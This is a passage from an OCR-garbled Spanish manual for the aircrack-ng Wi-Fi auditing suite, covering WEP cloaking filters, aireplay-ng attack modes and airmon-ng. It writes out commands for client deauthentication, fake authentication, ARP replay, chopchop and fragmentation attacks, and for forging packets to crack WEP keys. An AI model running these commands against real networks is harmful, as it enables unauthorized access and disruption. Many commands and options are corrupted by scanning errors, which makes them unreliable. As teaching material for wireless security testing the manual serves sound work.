- duplicate iv: Eliminar todos los IV duplicados. 

- signal dup consec sn: usar a la vez signal (si está disponible), 
duplícate y consecutive sequence number. El filtrado es mucho más 
preciso que usar todos estos filtros uno por uno. 

—null-packets 

Asumir que los paquetes nulos pueden ocultarse. 

—disable-base filter 

No aplicar el filtro base. 

—drop-frag 

Eliminar los paquetes fragmentados 

—help 

Muestra esta pantalla de uso 












6.1. Pruebas 


Capturando tráfico 

Destruir todos los VAP: 
airmon-ng stop athO 

Crear una interfaz en modo monitor en este easo en el eanal 6: 
airmon-ng start wifiO 6 

Capturar todo el tráfieo: 

tepdump -n 65535 -i athO -w wep eloaking full speed dl.peap 

Confirmando la clave 

Hay 422.879 paquetes WEP y 248.010 de ellos se pueden deseifrar eon esta elave. 

Tratando de descifrar la clave WEP 

aireraek-ng wep eloaking full speed dl.peap -b 00;12:BF:12:32:29 -K -n 64 -d 1F:1F:1F 
F1 eraqueo no funeiona en ese arehivo direetamente, ineluso si se da el eomienzo de la elave (-d). 

Si se proporciona la clave completa, el descifrado muestra que el 56% se descifra correctamente y 
por lo tanto el 44% de estos paquetes de datos están encubiertos: 

Filtrar paquetes encubiertos Wep 

F1 filtro base y los filtros de señal se aplican en este archivo. Creará 2 archivos: 

* wep cloaking full speed dl-filter.pcap: contiene todos los paquetes filtrados de una red 
especifica. 

* wep_cloaking_full_speed_dl-cloaked.pcap: contiene todos los paquetes encubiertos de esta 
red. 

Descifrando el fichero de captura filtrado 

Ahora el craqueo funciona. PTW no funciona en este caso ya que solo contiene datos, casi sin ARP. 
Observar que "Decrypted correctly: 81%" significa que no todos los paquetes se pueden descifrar 
con la clave, por lo que todavía hay paquetes encubiertos, pero no los suficientes como para evitar 
el descifrado. 

Resumen 

Fn el fichero filtrado, aún hay 293.986 paquetes de datos WFP y 246.212 pueden ser descifrados 
con la clave. Fsto hace que aún hay 47756 paquetes WEP por descifrar. 

En el archivo que contiene los paquetes encubiertos, solo están presentes algunos paquetes no 
encubiertos: 1798 (alrededor del 1,4% de error). 


En resumen, con solo un filtro simple, se eliminó alrededor del 62% de los paquetes encubiertos. 
126K encubiertos en el archivo de paquetes encubiertos + 48K en el archivo filtrado. Ayudó a 
descifrar el archivo, pero lo haremos mejor con los otros filtros y el filtros combinados. 



6.2. Encubrimiento Wep 

El encubrimiento Wep funciona insertando paquetes en el aire que el atacante cree que son reales y 
esto confunde el análisis estadistico del atacante. El atacante no puede distinguir la diferencia entre 
los paquetes del producto de la WLAN y los paquetes de suplantación generados. El encubrimiento 
Wep está destinado a evitar descifrar la clave, no descifrar el tráfico y dado que nada es perfecto, a 
veces falla. 

6.2.1. Como funciona 

Por cada paquete de datos enviado por el AP y los clientes incluidoslos paquetes de broadcast, un 
paquete encubierto es enviado por un sensor. La única diferencia entre el paquete encubierto y el no 
encubierto es: 

• Número de secuencia: utiliza un número de secuencia diferente al de su equivalente sin 
encubrir, pero cercano al no encubierto; a veces es el mismo. 

• Parámetros WEP 

• Contenido de la carga útil 

• Señal si el sensor no está en el mismo lugar que el AP 

Los otros atributos, incluido el tamaño del paquete, son exactamente los mismos. 

Inconvenientes 

Aqui lo que se observó al analizar la tecnología: 

• Dado que casi cada paquete tiene su versión encubierta en el aire, la velocidad de la red se 
reduce: las pruebas muestran que en una red de 11Mbit, con el encubrimiento habilitado, el 
ancho de banda máximo es de alrededor de 300 kb/seg y alrededor de 600-700 kb/seg sin. 

• No evita descifrar el tráfico si tiene la clave, solo evita descifrar la clave. 

• Eiltrar paquetes encubiertos no siempre es necesario para descifrar la clave. 

• Un sensor tarda alrededor de 60 segundos en "ver" el punto de acceso y por lo tanto durante 
los primeros 60 segundos de actividad del AP, los paquetes no están encubiertos. 

6.2.2. Filtrando paquetes encubiertos Wep 

Los siguientes elementos se pueden usar para filtrar los paquetes encubiertos Wep: 

• Número de secuencia (SN) 

• Paquetes sin encubrir 

• Cada paquete de datos está encubierto 

• Calidad de la señal 

• Vector de inicialización (IV) 

• Tamaño del paquete 

• Otros atributos del paquete 

• Sincronización 

• Orden de llegada 

Nota: este análisis no deberia basarse en el orden del paquete recibido; la llegada depende de varios 
factores: su ubicación en comparación con el sensor que envia el paquete encubierto, el AP, la 
ubicación del sensor en comparación con el AP y algunas otras cosas. 

Secuencia de números 

El número de secuencia es un número de 12 bits utilizado en los paquetes de gestión y datos. En 
casi todos los casos, este número es secuencial para cada trama enviada en una dirección; cada nodo 
(AP o clientes) tiene su propio contador para el número de secuencia. 

Paquetes sin encubrir 

Los paquetes de administración y control no están encubiertos y parece que solo los paquetes de 
datos con subtipo 0 están encubiertos. 




Cada paquete de datos está encubierto 

Cada paquete de datos está encubierto, pero no cuente con el hecho de que obtendrá todos ellos o el 
sensor los verá a todos. Puede perder algunos dependiendo de su ubicación. 

Calidad de la señal 

Si el AP y el sensor no están cerca el uno del otro, la calidad de la señal se puede utilizar para filtrar 
los paquetes encubiertos. 

Vector de inicialización 

Este es un número de 24 bits. En un archivo de captura, la probabilidad de que 2 paquetes tengan el 
mismo IV es realmente baja; puede eliminar con seguridad todos los paquetes que tengan el mismo 
IV. 

Otros atributos del paquete 

El paquete encubierto tiene los mismos atributos que "su" paquete no encubierto: 

• El tamaño del paquete encubierto es el mismo que el del paquete sin cubrir 

• Los atributos EromDS y ToDS son los mismos. Es lógico ya que el número de secuencia es 
el truco principal para engañar a las herramientas de cracking. 

Tamaño del paquete 

Cada paquete encubierto tiene el mismo tamaño que el que no está encubierto. No filtrar solo con 
esta información porque, en una red ocupada, muchos paquetes tendrán el mismo tamaño. E incluso 
en redes de bajo tráfico, a veces AP envia paquetes que siempre tienen el mismo tamaño en el aire, 
por ejemplo, tramas IGMP. 

Sincronización 

El tiempo necesario para recibir un paquete encubierto podria ser analizado; en comparación con su 
equivalente no encubierto ya que el sensor recibe el paquete real y luego forja un paquete 
encubierto Wep con la información del real. 

Para esto, se necesitan 2 paquetes, uno real y uno oculto, y tenemos que aseguramos de que el 
estado de "ocultamiento" de ambos paquetes sea preciso y que el paquete oculto se falsifique con el 
real que tenemos. 

Observación: El tiempo entre cada paquete grabado puede no ser exacto. 

Orden de llegada 

Al igual que el filtro de "sincronización", se pueden usar 2 paquetes, uno sin encubrir y su 
equivalente encubierto para encontrar el encubierto. Cuando se encuentra el encubierto, el paquete 
encubierto puede descartarse y cada 2 paquetes que van en la misma dirección, lo que significa que 
debe hacerse una vez para el AP y una para cada cliente. 

Pero, como el "timing", no es el mejor filtro 

6.2.3. Ejemplos reales 

Esta parte mostrará los archivos de captura de encubrimiento Wep reales y analizará diferentes 
casos posibles. El filtrado se realiza combinando uno o más elementos de los filtros descritos 
anteriormente. 

El filtrado se puede hacer en la mayoría de los casos con la señal y la sincronización o el orden de 
llegada, pero esta es la peor opción, pero deben usarse como último recurso. 

Red de bajo tráfico 

En este ejemplo, un ordenador está haciendo ping a otro. Esta captura se filtra. Hay muchas redes 
pero solo una red tiene encubrimiento Wep. 

En estas imágenes, hay 2 paquetes de datos reales (paquete 7509 y 7538), los otros 2 están 
encubiertos: 



Existen algunas posibilidades para fdtrar el paquete encubierto para 7509/7510: - ambos paquetes 
pueden descartarse ya que tienen el mismo número de secuencia. - usar la señal / sincroni z ación 
para encontrar el paquete encubierto. 

Para el paquete 7538/7539, será más fácil, es fácil averiguar cuál está encubierto, un beacon tiene 
los mismos números de secuencia que el paquete 7539; 7539 está encubierto: 


Red de alto tráfico 

En dicha red, el fdtrado es más difícil ya que hay muchos paquetes entre cada beacon. Eos paquetes 
encubiertos aún se pueden fíltrar verificando el número de secuencia del beacon y esto es lo que 
hace el fdtro base. En este caso, ningún paquete utiliza el número de secuencia del beacon. 


Asi que hay que usar otras formas. Aún se puede usar el beacon pero de otra manera: dado que 1319 
es un número de secuencia válido, se conocen los números de secuencia anteriores (1318) y 
siguientes (1320) de paquetes válidos. Se está volviendo más complicado, estos números de 
secuencia se usan más de una vez. 

Como se sabe, el encubrimiento Wep copia los atributos incluido el tamaño del paquete de su 
paquete real equivalente, los paquetes encubiertos Wep se pueden encontrar fácilmente: 


Posición 

Normal 

Encubierto 

Tamaño 

paquete 

Razón 

Antes 

beacon 

Packet 
#399244 
(SN: 1318) 

Packet 
#399246 
(SN: 1320) 

1684 

octetos 

Elegó antes del beacon y por lo tanto 1318 es un 
SN válido. El encubierto tiene los mismos 
atributos que el sin encubrir; los 2 paquetes que 
tienen el mismo SN no tienen los mismos 
atributos 

Antes 

beacon 

Packet 
#399241 
(SN: 1317) 

Packet 
#399243 
(SN: 1318) 

1684 

octetos 

SN 1318 ya está siendo utilizado por un paquete 
válido (ver linea anterior) y por lo tanto el SN 
válido anterior al318esl317y también estos 2 
paquetes tienen los mismos atributos; este no es 
el caso de los 2 paquetes que tienen SN 1318 

Después 

beacon 

Packet 

#399249 

Packet 
#399251 
(SN: 1320) 

1400 

octetos 
(SN: 1320) 

En este caso, no hay una buena manera de 
distinguir lo real de lo falso y por lo tanto hay 2 
opciones: descartar o usar fdtro de señal. 

Después 

beacon 

Packet 
#399253 
(SN: 1321) 

Packet 
#399255 
(SN: 1323) 

1684 

octetos 

El número de secuencia siguiente al 1320 
(previamente SN válido) es 1321, no 1323 


6.2.4. Implementación 

El programa utiliza los siguientes estados de paquetes: 

• unknown: no estoy seguro si es un paquete real o uno oculto (aún no analizado). 

• uncloaked: Seguro que es sin encubrir 

• potencially cloaked: puede ser un paquete real, pero también podria ser uno encubierto. Se 
deben realizar más comprobaciones para confírmar un caso u otro 

• cloaked: Seguro que este paquete está encubierto 




El principal truco del encubrimiento Wep es que usa números de secueneia cereanos al real y por lo 
tanto el punto eentral de nuestro análisis serán los números de seeueneia. 

También tiene algunos filtros que se pueden eombinar en diferentes órdenes que darán resultados 
diferentes. 

Así es eomo fúneiona: 

1. Cargar todos los datos de una red espeeífiea (bssid) en una lista 

2. Marear todos los paquetes de datos eomo estado "known" y marear todos los demás (paquetes de 
gestión) eomo sin encubrir. 

3. Aplicar el filtro base. 

4. Apliear todos los filtros que no sean base en el orden solieitado por el usuario. 

5. Marear todos los paquetes de estado "known" eomo "uncloaked" 

6. Marear todos los paquetes "poteneially eloaked" eomo "eloaked" 

7. Eseribir todos los paquetes "uneloaked" en un arehivo de captura 

8. Escribir todos los paquetes "eloaked" en otro arehivo de eaptura 

Nota: Es realmente importante tener todos los paquetes y si es posible los eneabezados de radiotap / 
prisma en el arehivo de eaptura, ineluidos los paquetes "inútiles" para el eraqueo eomo los beaeons. 

Filtros 

Aetualmente solo se implementan el filtro base y el filtro de señal. 

Base filter 

Como todos los paquetes de administraeión no están eneubiertos, eualquier otro paquete, a unos 
poeos paquetes de distaneia en la misma direeeión, que usa el mismo número de seeueneia están 
eneubiertos. 

sígnal 

Intentar filtrar según la señal para paquetes que provienen del AP. Se requieren eneabezados de 
prisma o radiotap para que este filtro funcione. 

1. Calcular la señal promedio para todas los beaeons y los paquetes de respuesta de prueba 

2. Eos paquetes que tendrán exaetamente la misma señal, se marearán eomo no eneubiertos 

3. Eos paquetes que tienen el estado poteneially eloaked y tienen una señal eon una difereneia 
absoluta de más de 2 se marcarán como eloaked (abs (señal promedio - señal de trama aetual)> 2)). 

4. Eos paquetes que tienen el estado deseonoeido y tienen una señal eon una difereneia absoluta de 
más de 3 se marearán eomo eneubiertos (abs (señal promedio - señal de trama aetual)> 3)). 

Nota: Ea implementaeión aetual se basa en la ealidad de señal madwifi-ng. Se mejorará el eáleulo 
de la señal promedio. Se agregará el filtrado de mareos de eliente. 

duplicatesnap 

Elimina el número de seeueneia duplieado solo para el AP (que están eerea uno del otro). 

duplicatesnclient 

Elimina el número de secuencia duplicado solo para el eliente (que están eerea uno del otro). 

duplicatesn 

Elimina todos los números de seeueneia duplieados tanto para el AP eomo para el cliente (que están 
eerea uno del otro). Básieamente apliea filtros duplieate sn ap y duplieate sn elient 

consecutivesn 

Piltro basado en el hecho de que IV debe ser conseeutivo (solo para AP). 

duplicateiv 

Este filtro eliminará todos los paquetes que tengan el mismo IV. 

signaldupconsecsn 

Piltra utilizando la señal (si está disponible), número de secuencia duplicado y consecutivo; utiliza 
todos esos filtros en uno y, por lo tanto, el fdtrado es mueho más preeiso. Se pueden eubrir más 
easos para averiguar si los paquetes están oeultos o no. 



6.3. FAQ 

1. No puedo descifrar la clave WEP, ¿que significa que hay camuflaje wep? 

Si es una red doméstica, entonces no. El hardware es demasiado costoso para un individuo. Es más 
barato comprar hardware nuevo que admita WPA. 

2. ¿Cómo puedo saber si los datos que tengo provienen de una red oculta Wep? 

Si tiene los siguientes sintomas, hay algunas posibilidades de que la red tenga encubrimiento Wep: 

• La red usa WEP 

• No se puede descifrar la clave o el porcentaje "descifrado correctamente" es de alrededor del 
50-65%. 

• El uso de esta herramienta genera paquetes encubiertos. 

• Algunas compañías anunciaron en la web que compraron encubrimiento Wep. 



7. Aireplay-ng 


Aireplay-ng es otra herramienta poderosa del paquete aireraek-ng y puede ser utilizada para 
generar o acelerar el tráfico en el punto de acceso (AP). Esto puede ser especialmente útil en 
ataques como un ataque de deauth que golpea a todos excepto al punto de acceso, los ataques de 
contraseña WEP y WPA2, asi como la inyección ARP y los ataques de repetición. 

Aireplay-ng puede obtener paquetes de 2 fuentes: 

1. Un flujo vivo de paquetes, o 

2. Un archivo pcap pre-capturado 

El archivo pcap es el tipo de archivo estándar asociado con las herramientas de captura de paquetes 
como libpcap y winpcap. La aplicación Wireshark genera archivos pcap. 

Estos incluyen deauth, fake deauth, interactive, arpreplay que es necesario para el craceo rápido 
WEP, chopchop que es una forma de técnica estadistica para el descifrado de paquetes WEP sin 
descifrar la contraseña, fragmento, caffe latte que ataca el lado del cliente y otros. 

uso: aireplay-ng <opciones> <replay interface> 

Para todos los ataques, excepto la autenticación y la autenticación falsa, se pueden usar los 
siguientes filtros para limitar que paquetes se presentarán al ataque en particular. La opción de filtro 
más utilizada es la "-b" para seleccionar un punto de acceso especifico. 

Opciones de fdtro: 


-b bssid 

Dirección MAC del punto de acceso 

-d dmac 

Dirección MAC de destino 

-s smac 

Dirección MAC orugen 

-m len 

Longitud minima del paquete 

-n len 

Longitud máxima del paquete 

-u type 

Control de paquete, campo de tipo 

-V subt 

Control de paquete, campo de subtipo 

-t tods 

Control de paquete, a bit DS 

-f fromds 

Control de paquete, de bit DS 

-w iswep 

Control de paquete, bit WEP 

-D 

Desactivar la detección AP 


Opciones de reproducción: 

Al reproducir (inyectar) paquetes, se aplican las siguientes opciones. Tener en cuenta que no todas 
las opciones son relevantes para cada ataque. La documentación especifica del ataque proporciona 
ejemplos de las opciones relevantes. 


-X nbpps 

Número de paquetes por segundo 

-p fctrl 

establecer la palabra de control del paquete (hexadecimal) 

-a bssid 

Establecer la dirección MAC del AP 





-e dmae 

Estableeer la direeeión MAC del destino 

-h smae 

Estableeer la direeeión MAC del origen 

-g valué 

Cambiar el tamaño del buflfer de anillo (por defeeto: 8) 

-F 

Elegir el primer paquete de eoineideneia 


Opciones de ataque fakeauth: 


-e essid 

Estableeer el SSID del AP objetivo 

-0 npekts 

Número de paquetes por ráfaga (O=auto, defeeto: 1) 

-q see 

Segundos entre keep-alives 

-Q 

Enviar las solieitudes de reasoeiaeión 

-y prga 

Elujo eifrado para elave eompartida 

-Tn 

salir después de volver a intentar la solieitud de autentieaeión 
falsa n veees 


Opciones de ataque de reprodueeión Arp; 

-j : inyeetar paquetes desde DS 

Opeiones de ataque de fragmentaeión; 

-k IP : estableeer la IP de destino en los fragmentos 
-1 IP : estableeer la IP del origen en los fragmentos 

Opeiones de ataque de prueba: 

-B : aetivar el test de veloeidad 

Opeiones de la fuente: 

-i ifaee : eapturar los paquetes desde esta interfaz 
-r file : extraer los paquetes del fiehero peap 

Opeiones varias: 


-R 

desaetivar el uso de /dev/rte 

-D 

Desaetiva la deteeeión AP Algunos modos no proeedarán si no se 
oye el beaeon AP Esto desaetiva esta funeionalidad. 

—ignore-negative-one 

si no se puede determinar el eanal de la interfaz, ignorar la falta de 
eoineideneia, neeesaria para efg80211 sin parehear 


Modos de ataque: 


—deauth eount 

deautentiear 1 o todas las estaeiones (-0) 

—fakeauth delay 

Autentieaeión falsa eon AP (-1) 

—interaetive 

Seleeeión interaetiva de paquete (-2) 

—arpreplay 

Respuesta estándar ARP-request (-3)deseneriptar / 
eortar el paquete WEP (-4) 

—ehopehop 

deseneriptar/eortar el paquete WEP (-4) 

—fragment 

generar un flujo de elaves válido (-5) 

—eaffe-latte 

eonsultar un eliente para nuevos IVs (-6) 







—cfrag 

fragmentos contra un cliente (-7) 

—migmode 

ataque modo de migración WPA (-8) 

—test 

Pruebas de inyección y cualidad (-9) 

—help 

Visualiza las opciones de este comando 


Los ataques pueden obtener paquetes para reprodueir desde 2 fuentes. El primero es un flujo de 
paquetes en vivo desde su tarjeta inalámbriea. El segundo es de un arehivo peap. El formato peap 
estándar (Paeket CAPture), es reeonoeido por la mayoría de las herramientas eomereiales y de 
eódigo abierto de eaptura y análisis de tráfieo. Leer de un arehivo es una earaeterística a menudo 
pasada por alto de aireplay-ng. Esto le permite leer paquetes de otras sesiones de eaptura. Tener en 
euenta que varios ataques generan arehivos peap para una fáeil reutilizaeión. 

Ataque tipo 0: Ataque de deautenticación de la identidad del cliente 

Este tipo de ataque tiene eomo objetivo invalidar la identidad al eliente. Esto nos permite, entre 
otras opeiones, forzar al cliente a reconectarse, generando más paquetes que puedan ser estudiados. 
Ea forma de ejecutar un ataque de este tipo es la siguiente: 

aireplay-ng -0 N -a [MAC del P.A.] -c [MAC del objetivo] interfaz 

siendo: 

• -0 : indica el ataque de deautenticación 

• N : número de paquetes de deautenticación que se enviarán 

• -a [MAC]: indica la MAC del punto de acceso 

• -c [MAC]: indica la MAC del cliente 

Ataque tipo 1: Ataque de autenticación falsa 

En caso de no existir ningún cliente conectado al punto de acceso, dificulta mucho los ataques al no 
existir un tráfico de paquetes. Sin embargo podemos generar un cliente falso desde nuestro 
ordenador mediante la opción de ataque de autenticación falsa. Antes de nada, sincronizaremos 
nuestra tarjeta con el canal del punto de acceso: 

airmon-ng start interfaz canal 

Después se efectuará el ataque usando el siguiente comando: 
aireplay-ng -1 N -e [ESSID] -a [MAC del P.A.] -h [nuestra MAC] interfaz 
siendo: 

• -1 : indica el ataque de autenticación falsa 

• N : número de paquetes de deautenticación que se enviarán 

• -e [ESSID]: indica la ESSID o nombre de red a atacar 

• -a [MAC]: indica la MAC del punto de acceso 

• -c [MAC]: indica nuestra MAC. 

Ataque tipo 2: Reenvío interactivo de paquetes 

Este ataque consiste en ponernos a la escucha, obtener un paquete o escoger un paquete *.cap que 
hayamos obtenido con anterioridad e inyectarlo. Se ejecutará este ataque mediante el comando: 

aireplay-ng -2 <opc flltro> <opc envío> -r <archivo> interfaz 


siendo: 




• -2 : indica el ataque de reenvió interaetivo de paquetes 

• opciones de filtro: Filtran los paquetes a recibir 

• opciones de envió: Configuran nuestra inyeeeión 

• -r archivo: incluiremos esta opeión si usamos un arehivo guardado eon anterioridad 

Ataque tipo 3: Reinyección de peticiones ARP 

Este es el tipo de ataque más eomún y el más efeetivo a la hora de generar nuevos veetores de 
inieializaeión. Los veetores de inieializaeión se generan de forma dinámiea, intentando eifrar los 
paquetes con diferentes elaves para evitar que un ataeante eonsiga deseifrar la elave prineipal. Con 
un único paquete nos costaría años descifrar la clave, asi que proeederemos a generar tantos 
veetores eomo nos sea posible. 

El ataque en si eonsiste en escuehar un paquete ARP además de su respuesta y reenviarlo al punto 
de aceeso. Éste nos volverá a enviar un paquete de respuesta ARP pero con un vector de 
inieializaeión distinto al primero. Este proeeso se reproduee hasta tener sufieientes veetores de 
inieializaeión distintos eomo para poder dedueir la elave. La forma de ejeeutar un ataque de este 
tipo es la siguiente: 

aireplay-ng -3 -b [MAC del P.A.] -h [MAC del objetivo] interfaz 
siendo: 

• -3 : indica el ataque de reinyeceión de paquetes ARP 

• -b [MAC]: indiea la MAC del punto de aeeeso 

• -h [MAC]: indiea la MAC del eliente 

Ataque tipo 4: Chop-Chop de Korek 

Cuando utilizamos el ataque de reinyeeeión de paquetes ARP eon una MAC falseada y no 
obtenemos un paquete ARP, se proeede a usar el ataque ehop-ehop de Korek. Después de usar los 
ataques de autentieaeión falsa y de reinyeeeión de paquetes (ataques 1 y 3 respeetivamente) se 
proeede a ineluir el siguiente eomando: 

aireplay-ng -4 -h [MAC del objetivo] -r <arohivo> interfaz 

siendo: 

• -4 : indiea el ataque de Chop-ehop de Korek 

• -h [MAC]: indiea la MAC del eliente 

• -r arehivo: arehivo *.cap donde vamos a guardar la información 

Una vez ejeeutada la aeeión se nos generarán 2 arehivos, el *.eap que hemos seleeeionado 
en las opeiones y un arehivo *.xor eon el keystream. Con estos 2 arehivos podremos orear 
nuestra propia petición ARP. Para ello se usará la aplioaoión paoketforge-ng de la siguiente manera: 

paoketforge-ng -0 -a [BSSID] -h [MAC objetivo] -k [IP destino] -1 [IP Origen] -y <> -w <> 

siendo: 

• -0 : indiea que se va a orear un arehivo ARP 

• -a BSSID: BSSID de la red 

• -h [MAC]: indiea la MAC del oliente 

• -k [IP]: IP del enrutador 

• -1 [IP]: IP del cliente, en caso de que no lo conozoamos podemos haoer uso del comando 
Linux: tepdump -s 0 -n -e -r <archivo.cap> 

• -y archivo: archivo *.xor obtenido en el ataque 



• -w archivo; archivo *.cap donde se va a erear el nuevo paquete 

Una vez tengamos el paquete, simplemente lo enviaremos al punto de aceeso utilizando el 
tipo de ataque 2 de reenvió interactivo de paquetes 

aireplay-ng -2 -r <archivonuevo.cap> interfaz 

Ataque tipo 5: Fragmentación 

Este tipo de ataque busca capturar un PROA (Pseudo Random Generation Algorithm) que es una 
parte de un paquete que está formada por texto plano y texto cifrado y que sirve para aumentar el 
nivel de seguridad. Este ataque sólo funeiona en redes con seguridad WEP 
Ea forma de ejecutar un ataque de este tipo es la siguiente: 

aireplay-ng -5 -b [MAC del PA.] -h [MAC del objetivo] interfaz 

siendo: 

• -5 : indica el ataque de fragmentaeión 

• -b [MAC]; indiea la MAC del punto de aceeso 

• -h [MAC]; indica la MAC del eliente 

Si el ataque tiene éxito comenzará a recibir información hasta tener los 1500 bits de un PRGA en un 
arehivo *.org. Tal y como ocurría con el ataque Chop-ehop usaremos packetforge para construir el 
paquete y el ataque de tipo 2 para inyectarlo. 

7.1. Fragmentación vs. Chopchop 

A continuación se muestran las diferencias entre los ataques de fragmentación y chopchop 

7.1.1. Fragmentación 

Pros: 

• Por lo general, obtiene la longitud total del paquete de 1500 bytes xor. Esto significa que 
posteriormente puede erear bastante bien cualquier tamaño de paquete. Incluso en los casos 
en que se reeopilan menos de 1500 bytes, hay sufieiente para erear solieitudes ARP. 

• Puede funcionar donde chopehop no funciona. 

• Es extremadamente rápido Produee el flujo xor extremadamente rápido cuando tiene éxito. 
Contras: 

• Necesita más información para iniciarlo; información de la dirección IP de lE. Muy a 
menudo esto se puede adivinar. Mejor aún, aireplay-ng asume las IP de origen y destino de 
255.255.255.255 si no se espeeifica nada. Esto fúneionará con éxito en la mayoría de los AP, 
si no en todos. Entonces esta es una estafa muy limitada. 

• Ea configuraeión para ejecutar el ataque está más sujeta a los controladores del dispositivo. 
Por ejemplo, Atheros no genera los paquetes correctos a menos que la tarjeta inalámbrica 
esté eonfigurada con la dirección mac que está falsificando. 

• Debe estar fisieamente más eerca del punto de acceso porque si se pierden paquetes, el 
ataque falla. 

• El ataque fallará en los puntos de acceso que no manejan adecuadamente los paquetes 
fragmentados. 

7.1.2. Chopchop 

Pros: 

• Puede funcionar donde no funciona la fragmentación. 

• No necesita eonoeer la informaeión de cualquier IP 



Contras: 

• No se piede usar contra cada punto de acceso. 

• Los bits xor máximos se limitan a la longitud del paquete del ataque chopchop. Aunque en 
teoría podría obtener 1500 bytes de la transmisión xor, en la práctica, rara vez o nunca ve 
paquetes inalámbricos de 1500 bytes. 

• The máximum xor bits is limited to the length of the packet you chopchop against. Although 
in theory you could obtain 1500 bytes of the xor stream, in practice, you rarely if ever see 
1500 byte wireless packets. 

• Es mucho más lento que el ataque de fragmentación 

7.2. Optimizar ias veiocidades de inyección 

Optimizar la velocidad de inyección es más arte que ciencia. Primero, intente usar las herramientas 
"tal cual". Puede intentar usar el parámetro "-x" para variar la velocidad de inyección. 
Sorprendentemente, reducir este valor a veces puede aumentar su tasa general. 

Puedes intentar jugar con la velocidad de transmisión. lE "iwconfig wlanO rate IIM". Dependiendo 
del controlador y de como inició la tarjeta en modo monitor, generalmente es de 1 u 11 MBit por 
defecto. Si está lo suficientemente cerca, configúrelo en un valor más alto, como 54M, de esta 
manera obtendrá más paquetes por segundo. Si está demasiado lejos y los paquetes no viajan tan 
lejos, intente reducirlo a (por ejemplo) IM. 



8. Airmon-ng 


Este programa puede usar para habilitar el modo monitor en las interfaees inalámbricas. También se 
puede usar para volver del modo monitor al modo administrado. Ingresar el comando airmon-ng sin 
parámetros mostrará el estado de las interfaces. Averiguaremos el nombre asignado a nuestra 
interfaz mediante los comandos Linux ipconfig o iwconfig, aunque también podemos hallarla 
mediante el comando airmon-ng 

uso: 

airmon-ng <start|stop> <interfaz> [canal] 
airmon-ng <check|check kill> 

donde: 


<start stop> 

indica si desea iniciar o detener la interfaz. 

<interfaz> 

especifica la interfaz. 

[canal] 

opcionalmente configura la tarjeta en un canal especifico. 

<check check kill> 

"check" mostrará cualquier proceso que pueda interferir con 
la suite aircrack-ng. Se recomienda encarecidamente que se 
eliminen estos procesos antes de usar la suite aircrack-ng. 
"Check kill" verificará y eliminará los procesos que puedan 
interferir con la suite aircrack-ng. 


8.1. Ejemplos 
8.1.1. Usos habituales 

Verificar el estado y/o enumere las interfaces inalámbricas 

~# airmon-ng 

PHY Interface Driver Chipset 

phyO wlanO ath9k_htc Atheros Communications, Inc. AR9271 802.lln 
Comprobación de procesos interferentes 

Al poner una tarjeta en modo monitor, verificará automáticamente los procesos que interfieren. 
También se puede hacer manualmente ejecutando el siguiente comando: 

~# airmon-ng check 

Found 5 processes that could cause trouble. 

If airodump-ng, aireplay-ng or airtun-ng stops working after 
a short period of time, you may want to kill (some of) them! 

PID Ñame 

718 NetworkManager 
870 dhclient 

1104 avahi-daemon 

1105 avahi-daemon 
1115 wpa supplicant 

Matando los procesos interferentes 

Este comando detiene a los administradores de red y luego elimina los procesos interferentes que 
quedan: 

~# airmon-ng check kill 
Killing these processes: 




PID Ñame 

870 dhclient 

1115 wpa supplicant 

Activar el modo monitor 

Nota: ¡Es muy importante matar a los administradores de red antes de poner una tarjeta en modo 
monitor! 

~# airmon-ng start wlanO 

Found 5 proeesses that eould eause trouble. 

If airodump-ng, aireplay-ng or airtun-ng stops working after 
a short period of time, you may want to kill (some of) them! 

PID Ñame 

718 NetworkManager 
870 dhelient 

1104 avahi-daemon 

1105 avahi-daemon 
1115 wpa supplieant 

PHY Interfaee Driver Chipset 

phyO wlanO athOk hte Atheros Communieations, Ine. AR9271 802.1 In 

(mao80211 monitor mode vif enabled for [phyOJwlanO on [phyOJwlanOmon) 

(mao80211 station mode vif disabled for [phyOJwlanO) 

Como se puede ver, ereó una interfaz de modo de monitor llamada wlanOmon y notifieó que hay 
algunos proeesos que interferirán eon las herramientas. 

Desactivar el modo monitor 
~# airmon-ng stop wlanOmon 
PHY Interfaee Driver Chipset 

phyO wlanOmon athOk hte Atheros Communieations, Ine. AR9271 802.1 In 
(mao80211 station mode vif enabled on [phyOJwlanO) 

(mao80211 monitor mode vif disabled for [phyOJwlanOmon) 

No olvidar reinieiar el administrador de red. Por lo general, se realiza eon el siguiente eomando: 
serviee network-manager start 

8.1.2. Madwifi-ng driver monitor mode 

Esto desoribe oomo poner una interfaz en modo monitor. Después de inioiar el ordenador, ejeoutar 
"iwoonfig" para mostrar el estado aotual de las interfaoes inalámbrioas. Es probable que se parezoa 
la siguiente salida, 
lo no wireless extensions. 
ethO no wireless extensions. 
wifiO no wireless extensions. 
athO IEEE 802.11b ESSID:"" Niokname:"" 

ModeiManaged ChannekO Aooess Point: Not-Assooiated 
Bit Rate:0 kb/s Tx-Power:0 dBm Sensitivity=0/3 
Retryioff RES thnoff Fragment thnoff 
Enoryption keyioff 
Power Management: off 
Link Quality:0 Signal levekO Noise levekO 
Rx invalid nwid:0 Rx invalid orypt:0 Rx invalid frag:0 
Tx exoessive retries:0 Invalid miso:0 Missed beaoon:0 
Si desea usar athO sin modo monitor, ejeoutar: 
airmon-ng stop athO 
Y el sistema responderá: 

Interfaee Chipset Driver 



wifiO Atheros madwifi-ng 

athO Atheros madwifi-ng VAP (parent: wifiO) (VAP destroyed) 

Ahora ejecutando “iwconfig”, el sistema responde: 
lo no wireless extensions. 
ethO no wireless extensions. 
wifiO no wireless extensions. 

También asegúrese de que el essid, el nickname y el cifrado no se hayan configurado. El punto de 
acceso muestra la dirección MAC de la tarjeta. La dirección MAC de la tarjeta solo se muestra 
cuando se utiliza el controlador madwifi-ng. Otros controladores no muestran la dirección MAC de 
la tarjeta. 

8.2.Trucos 

8.2.1. Confirmación de que ia tarjeta está en modo monitor 

Para confirmar que la tarjeta está en modo monitor, ejecutar el comando "iwconfig". Luego se 
puede confirmar que el modo es "monitor" y el nombre de la interfaz. 

Para el controlador madwifi-ng, el campo del punto de acceso de iwconfig muestra la dirección 
MAC de la tarjeta inalámbrica. 

8.2.2. Determinar ei canai actuai 

Para determinar el canal actual, ejecutar 
iwlist <nombre de interfaz> canal 

Si va a trabajar con un punto de acceso especifico, el canal actual de la tarjeta debe coincidir con el 
del AP. En este caso, es una buena idea incluir el número de canal al ejecutar el comando airmon-ng 
inicial. 

8.2.3. ¿Cómo voiver a poner ia interfaz en modo administrado? 

Depende del controlador que esté utilizando. Para todos los conductores excepto madwifi-ng: 
airmon-ng stop <interface name> 

